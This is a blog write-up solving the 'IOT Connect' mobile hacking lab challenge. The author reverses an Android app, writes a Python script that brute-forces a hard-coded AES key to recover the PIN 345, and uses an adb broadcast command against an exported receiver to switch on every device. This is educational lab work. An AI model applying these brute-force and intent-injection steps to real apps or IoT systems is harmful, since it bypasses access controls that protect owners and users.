IOT Connect

Hello everyone , In this blog post , I will try to explain my solution steps for IOT Connect challenge from Mobile Hacking Lab Platform . i hope it will be useful for you

1. After we install The APK then we open it and register then login with our account

2. After the login we found that we can’t control all devices !!!

   

   image.png
3. Our Approach to Enable the Master switch let’s try to Use It

   
4. we don’t have any pin code

5. Let’s Examine the AndroidManifest.xml Specific this activity com.mobilehackinglab.iotconnect.MasterSwitchActivity

   • this code have some things :

     • First User cannot Control the Master Switch

     • Valid users must enter a PIN before enabling the switch.

     • THEN the app send intent to enable The Master Switch

   
6. Let’s examine the BroadcastReceiver initialize Class then we found that :

   It Will work when the Pin is correct

   
7. After Search in the code i found Checker Class

   
8. Here we have the Pin OSnaALIWUkpOziVAMycaZQ== and use AES Encryption hard Coded in our application , let’s create a script to decrypt it

   from Crypto.Cipher import AES
   import base64
   
   encrypted_text = 'OSnaALIWUkpOziVAMycaZQ=='  # The base64 encoded string from the Java code
   
   def create_key_from_number(num):
       """
       Create a 16-byte key from a number by converting it to a byte array
       and padding with zeros to ensure the key length is 16 bytes.
       """
       key = str(num).encode('utf-8')  # Convert number to bytes
       key = key.ljust(16, b'\0')  # Pad the key to 16 bytes if it's shorter
       return key
   
   def attempt_decrypt(encrypted_text, key):
       """
       Attempt to decrypt the encrypted text using the provided key.
       Returns the decrypted text if successful, or None if decryption fails.
       """
       cipher = AES.new(key, AES.MODE_ECB)
       try:
           decrypted_bytes = cipher.decrypt(base64.b64decode(encrypted_text))
           decrypted_text = decrypted_bytes.decode('utf-8').strip()
           return decrypted_text
       except (ValueError, UnicodeDecodeError):
           return None
   
   def brute_force_decrypt(encrypted_text):
       """
       Brute-force attempt to find the correct key for AES decryption.
       Searches for a key that produces meaningful output, like "master_on".
       """
       for num in range(1000):
           key = create_key_from_number(num)
           decrypted_text = attempt_decrypt(encrypted_text, key)
           
           if decrypted_text and "master_on" in decrypted_text:
               print(f"Decrypt success and the key is {num}")
               print(f"Decrypted text: {decrypted_text}")
               return
       print("No valid key found")
   
   # Start the brute-force decryption attempt
   brute_force_decrypt(encrypted_text)
   

   
9. Then we will call the broadcast receiver MasterReceiver with MASTER_ON action of the broadcast intent , 345 as key : adb shell am broadcast -a MASTER_ON --ei key 345

   

and here we done by Macking all Devices Turned on